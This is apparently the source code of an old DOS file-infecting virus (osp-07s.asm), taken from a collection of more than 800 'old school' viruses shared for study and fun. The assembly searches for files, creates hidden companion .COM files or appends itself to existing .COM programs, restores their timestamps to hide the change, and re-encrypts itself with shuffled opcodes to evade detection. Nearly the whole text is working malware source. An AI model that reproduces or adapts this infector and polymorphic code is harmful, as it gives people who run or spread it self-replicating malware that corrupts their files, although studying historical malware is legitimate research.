osp-07s.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

				; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
	MOV	AH, 1AH
	LEA	DX, VEND
	INT	21H

	MOV	AH, 4EH		; Findfirst
	MOV	CX, 0		; Set normal file attribute search
	MOV	DX, FNAME_OFF
	INT	21H

	JNC	NEXT_LOOP	; if still finding files then loop
	JMP	END_PROG

	NEXT_LOOP :
	CMP	VTYPE, PARASTIC	; parastic infection?
	JE	START_INF	; yes, skip all this

	MOV	AH,47H
	XOR	DL,DL
	LEA	SI,FILE_DIR
	INT	21H

	CMP	WORD PTR VEND[F_SIZEL],0 ; Make sure file isn't 64k+
	JE	OK_FIND		; for spawning infections
	JMP	FIND_FILE

OK_FIND:
	XOR	BX,BX
	LM3	:		; find end of directory name
	INC	BX
	CMP	FILE_DIR[BX],0
	JNE	LM3

	MOV	FILE_DIR[BX],'\' ; append backslash to path
	INC	BX

	MOV	CX,13		; append filename to path
	LEA	SI,VEND[F_NAME]
	LEA	DI,FILE_DIR[BX]
	CLD
	REP	MOVSB

	XOR	BX,BX
	MOV	BX,1EH

	LOOP_ME: 		; search for filename ext.
	INC	BX
	CMP	BYTE PTR VEND[BX], '.'
	JNE	LOOP_ME

	INC	BX		; change it to COM
	MOV	WORD PTR VEND [BX],'OC'
	MOV	BYTE PTR VEND [BX+2],'M'


START_INF:

	CMP	VTYPE, PARASTIC	; parastic infection?
	JE	PARASTIC_INF	; yes.. so jump

;--------------------------------------
; Spawning infection

	LEA	DX, VEND[F_NAME]
	MOV	AH, 3CH		; Create file
	MOV	CX, 02H		; READ-ONLY
	OR	CX, 01H		; Hidden
	INT	21H		; Call INT 21H
	JNC	CONTIN		; If Error-probably already infected
	JMP	NO_INFECT
	CONTIN:

	INC	INF_COUNT
	MOV	BX,AX

	JMP	ENCRYPT_OPS
;----------------------------------------
; Parastic infection

	PARASTIC_INF :

        CMP     VEND[F_SIZEh],400H
        JGE     CONT_INF2
        JMP     NO_INFECT

        CONT_INF2:

        LEA     SI,VEND[F_NAME] ; Is Command.COM?
	LEA	DI,COM_NAME
	MOV	CX,11
	CLD
	REPE	CMPSB

	JNE	CONT_INF0	; Yes, don't infect
	JMP	NO_INFECT

	CONT_INF0:

	MOV	AX,3D02H	; Open file for reading & writing
	LEA	DX,VEND[F_NAME]	; Filename in FF/FN buffer
	INT	21H

	JNC	CONT_INF1	; error, skip infection
	JMP	NO_INFECT

	CONT_INF1:

        
	MOV	BX,AX

	MOV	AH,3FH		; Read first five bytes of file
	MOV	CX,05
	LEA	DX,FIRST_FIVE
	INT	21H

	CMP	WORD PTR FIRST_FIVE,9090H
	JNE	CONT_INF
	MOV	AH,3EH
	INT	21H
	JMP	NO_INFECT

CONT_INF:
        INC     INF_COUNT
        MOV     AX,4202H        ; Set pointer to end of file, so we
	XOR	CX,CX		; can find the file size
	XOR	DX,DX
	INT	21H

				;SUB     AX,0100h          ; Subtract PSP size
        MOV     WORD PTR SET_SI,AX  ; Change the MOV SI inst.
        MOV     WORD PTR ADD_DI,AX  ; ADD DI,xxxx
	MOV	BYTE PTR DI_INS,81H ; ADD DI op

	MOV	AX,4200H
	XOR	CX,CX
	XOR	DX,DX
	INT	21H

	MOV	AX,VEND[F_SIZEH]
	SUB	AX,5
	MOV	WORD PTR NEW_JMP+1,AX


	MOV	AH,40H
	MOV	CX,6
	LEA	DX,NEW_CODE
	INT	21H

	MOV	AX,4202H
	XOR	CX,CX
	XOR	DX,DX
	INT	21H


ENCRYPT_OPS:

;-----------------------------
; Change encryptions ops

	PUSH	BX

	MOV	AX,WORD PTR XCHG_1 ; Switch XCHG_1, and XCHG_2
	MOV	BX,WORD PTR XCHG_2
	MOV	WORD PTR XCHG_1,BX
	MOV	WORD PTR XCHG_2,AX
	MOV	AH, BYTE PTR XCHG_1+2
	MOV	BH, BYTE PTR XCHG_2+2
	MOV	BYTE PTR XCHG_1+2,BH
	MOV	BYTE PTR XCHG_2+2,AH

XOR_DONE:

CHG_TWO:
	XOR	CX,CX		; CX=0
	LEA	DI,SW_BYTE1	; DI->sw_byte1

CHG_REST:
	INC	ROT_NUM		; increment rotation number
	MOV	BX,ROT_NUM	; bx=rotation num
	MOV	AH,OP_SET[BX]	; ah = new op code from set
	MOV	BYTE PTR [DI],AH

	CMP	ROT_NUM,MAX_ROTATION ; max rotation num?
	JNE	CHG_CNT		; no, chg_cnt
	MOV	WORD PTR ROT_NUM,0 ; reset rotation num
CHG_CNT:
	INC	CX		; increment count
	CMP	CX,1
	LEA	DI,M_SW1
	JE	CHG_REST
	CMP	CX,2
	LEA	DI,M_SW2
	JE	CHG_REST
	CMP	CX,3
	LEA	DI,M_SW3
	JE	CHG_REST
	CMP	CX,4
	LEA	DI,SW_BYTE1
	JE	CHG_REST

CHG_THREE:
	XOR	CX,CX
	LEA	DI,SW_BYTE3
CHG_FOUR:
        CMP     BYTE PTR [DI],47H    ;  is first byte (of 3rd) 'INC DI'?
        MOV     BX,1                 ;
        JE      MOV_POS              ;  Yes, so change it to the second
        CMP     BYTE PTR [DI+1],47H  ;  is second byte 'INC DI'
        MOV     BX,2                 ;
        JE      MOV_POS              ;  Yes, change it to the third
        XOR     BX,BX                ;  Else, must be in final position
MOV_POS: MOV    WORD PTR [DI],9090H  ;  set all three bytes (of 3rd)
        MOV     BYTE PTR [DI+2],90H  ;  to NOP
        MOV     BYTE PTR [DI+BX],47H ;  place 'INC DI' in necessary pos.

	CMP	BX,2
	JNE	NO_CHANGE
	INC	CX
	CMP	CX,2
	LEA	DI,SW_BYTE4
	JNE	CHG_FOUR

NO_CHANGE:
	CMP	BYTE PTR TIMES_INC,9
	JE	INC_NUM
	INC	WORD PTR B_WR
	INC	WORD PTR E_JMP
	INC	WORD PTR E_JMP
	INC	TIMES_INC
	JMP	D2
INC_NUM:
	SUB	WORD PTR B_WR,09
	SUB	WORD PTR E_JMP,18
	MOV	TIMES_INC,0

;-----------------------
; Get random XOR number, save it, copy virus, encrypt code

D2:

	MOV	AH,2CH		;
	INT	21H		; Get random number from clock - millisecs

	MOV	WORD PTR XOR_OP+2,DX ; save encryption #


	MOV	SI,0100H
	LEA	DI,VEND+50	; destination 
	MOV	CX,OFFSET VEND-100H ; bytes to move
	CLD
	REP	MOVSB		; copy virus outside of code


	LEA	DI,VEND+ENC_DATA-204 ; offset of new copy of virus
	CMP	BYTE PTR VTYPE, PARASTIC
	JNE	GO_ENC
				;add     di,si

GO_ENC:
	CALL	ENCRYPT		; encrypt new copy of virus

;----------------------------------------
; Write and close new infected file

	POP	BX
	MOV	CX, OFFSET VEND-100H ; # of bytes to write
	LEA	DX, VEND+50	; Offset of buffer
	MOV	AH, 40H		; -- our program in memory
	INT	21H		; Call INT 21H function 40h

        CMP     VTYPE, PARASTIC ; parastic?
        JNE     CLOSE           ; no, don't need to restore date/time

        MOV     AX,5701H          ; Restore data/time
	MOV	CX,VEND[F_TIME]
	MOV	DX,VEND[F_DATE]
	INT	21H


CLOSE:	MOV	AH, 3EH
	INT	21H


NO_INFECT:

; Find next file
	FIND_FILE :

	CMP	INF_COUNT, MAX_INF
	JE	END_PROG
	MOV	AH,4FH
	INT	21H
	JC	END_PROG
	JMP	NEXT_LOOP


	END_PROG:
	EXIT	:
        CMP     INF_COUNT,0     ; Start parastic infection on next run
        JNE     FIND_DONE
        CMP     VTYPE, PARASTIC ; Parastic infection done?
        JE      FIND_DONE       ; yes, we're finished
        MOV     FNAME_OFF, OFFSET FNAME2     ; Point to new filespec
        MOV     VTYPE, PARASTIC              ; virus type = parastic
	JMP	FIND_FIRST


	FIND_DONE:
	MOV	VTYPE,SPAWN
	MOV	FNAME_OFF, OFFSET FNAME1
	RET
RESIDENT ENDP

END_ENCRYPT: 			; Let's encrypt everything up to here
OP_SET	DB	90H		; NOP
	DB	40H		; INC AX
	DB	43H		; INC BX
	DB	48H		; DEC AX
	DB	4BH		; DEC BX
	DB	0FBH		; STI
	DB	0FCH		; CLD
	DB	4AH		; DEC DX
	DB	42H		; INC DX
	DB	14 DUP(090H)
;------------------------------------------------
; Encrypt/Decrypt Routine
;-----------------------------------------------

ENCRYPT	PROC
CX_M	DB	0B9H		; MOV CX
B_WR	DW	(OFFSET END_ENCRYPT-OFFSET ENC_DATA)/2
	E2:
SW_BYTE1: 			; XOR [di],dx swaps positions with this
	NOP
XOR_OP:	XOR	WORD PTR [DI],0666H ; Xor each word - number changes accordingly
SW_BYTE3: 			; INC DI changes position in these bytes
	INC	DI
	NOP
	NOP
SW_BYTE4: 			; INC DI changes position in these bytes
	INC	DI
	NOP
	NOP
SW_BYTE2:
	NOP			; This byte changes into a char in op_set
	LOOP	E2		; loop while cx != 0

	RET

ENCRYPT	ENDP

VEND	DW	0		; End of virus

CSEG	ENDS
	END	START